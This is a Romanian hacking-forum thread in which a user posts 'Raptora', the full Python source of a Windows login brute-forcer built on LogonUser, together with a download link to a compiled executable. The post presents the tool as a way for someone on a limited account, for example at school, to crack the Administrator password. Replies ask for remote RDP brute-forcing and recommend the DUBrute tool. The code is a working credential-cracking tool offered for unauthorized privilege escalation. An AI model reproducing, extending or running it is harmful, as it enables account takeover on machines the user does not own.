Jump to content
Brenin

[RST] Raptora - Windows Login Brute Forcer

Recommended Posts

Salut.

Raptora este un brute forcer pentru orice cont de Windows.

Mai explicit, este pentru atunci cand aveti acces la un calculator pe un user limitat, si va doriti sa aveti drepturi de Administrator.

Programul este foarte simplu, va intreaba care user vreti sa il incercati, va intreaba care fisier de parole vreti sa il folositi, apoi isi incepe treaba. Daca a gasit ceva bun, va afisa pe ecran SUCCESS: userul si parola.

Am reusit sa il fac sa mearga si cu parole goale ( BLANK ).

Este foarte rapid, pe un cpu decent, adica dual core in sus, cu aproape 1000 parole/secunda.

Evitati sa specificati userul cu litere mari sau cu prima litera mare. Exemplu: folositi administrator in loc de Administrator.

Daca aveti vreo idee pentru imbunatatire, sunt deschid la idei noi.

Mai jos este codul sursa [Python]


##################################
##Windows Login Brute Force tool##
## Coded by BRENIN@RST ##
## Jabber: obelix@creep.im ##
##################################

def verify_success(username, password):
from win32security import LogonUser
from win32con import LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT
if password == 'BLANK':
try:
password = ""
LogonUser(username, None, password, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT)
return True
except Exception, e:
if "blank passwords" in str(e):
return True
else:
return False
else:
try:
LogonUser(username, None, password, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT)
return True
except Exception, e:
return False


u = raw_input('Enter the username you want to brute: ')
fis = raw_input('Enter the password_list file: ')

pwds = open(fis,'rU')
passwds = pwds.readlines()

for password in passwds:

if password.rstrip() == "%user%":
password = u.rstrip()
if password.rstrip() == "%user%1":
password = u.rstrip()+'1'
if password.rstrip() == "%user%12":
password = u.rstrip()+'12'
if password.rstrip() == "%user%123":
password = u.rstrip()+'123'

if verify_success(u, password.rstrip()):
print 'SUCCESS: => USERNAME: '+u+' '+'PASSWORD: '+password.rstrip()
break
else:
print '[+]Trying: '+u+' '+password.rstrip()

Mai jos este o varianta compilata cu py2exe pentru windows:

https://mega.co.nz/#!EcEGXBLL!eiuSH2n0yh__ZIccVeKTuw3TWrUIXA1DoyuUPnQHsJ8

Astept idei pentru imbunatatire.

Multumesc!

  • Upvote 1

Share this post


Link to post
Share on other sites
Bravo pentru ce ai facut.

Daca ai putea sa il faci asa:

brute pe ip - user.list - pass.list

Programul de mai sus este local. Exemplu, ai un cont "test" pe un calculator, si vrei sa ai privilegii de Administrator pe pc-ul respectiv, cum ar fi la scoala, etc.

Ca sa realizez o conexiune RDP in python este extrem de greu, cel putin pentru mine, si nu este nicio documentatie valabila pentru python. Singurele surse pentru asta sunt cele de la ncrack si thc-hydra, si rdesktop, care ma depasesc, din pacate.

DUBrute este mai mult decat suficient.

Share this post


Link to post
Share on other sites
1 hour ago, liverani said:

pai daca vrei sa obitii adminul pe rdpuri autnci tre sa instalezi Pythonul in acel rdp si daca nu ai drepturi de administrator , nu poti..deci mis e pare inutil

 

 

py2exe

  • Upvote 1

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...